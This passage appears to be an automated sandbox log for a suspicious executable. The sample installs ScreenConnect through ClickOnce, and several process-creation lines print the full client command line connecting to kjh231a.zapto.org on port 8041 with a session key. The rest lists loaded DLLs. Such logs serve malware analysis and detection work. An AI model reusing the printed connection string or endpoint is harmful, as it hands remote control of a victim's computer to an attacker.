                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 7608 -ip 7608Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7608 -s 864Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%2520Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "4e12b011-b423-4052-ba92-2560e19f3148" "User"
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
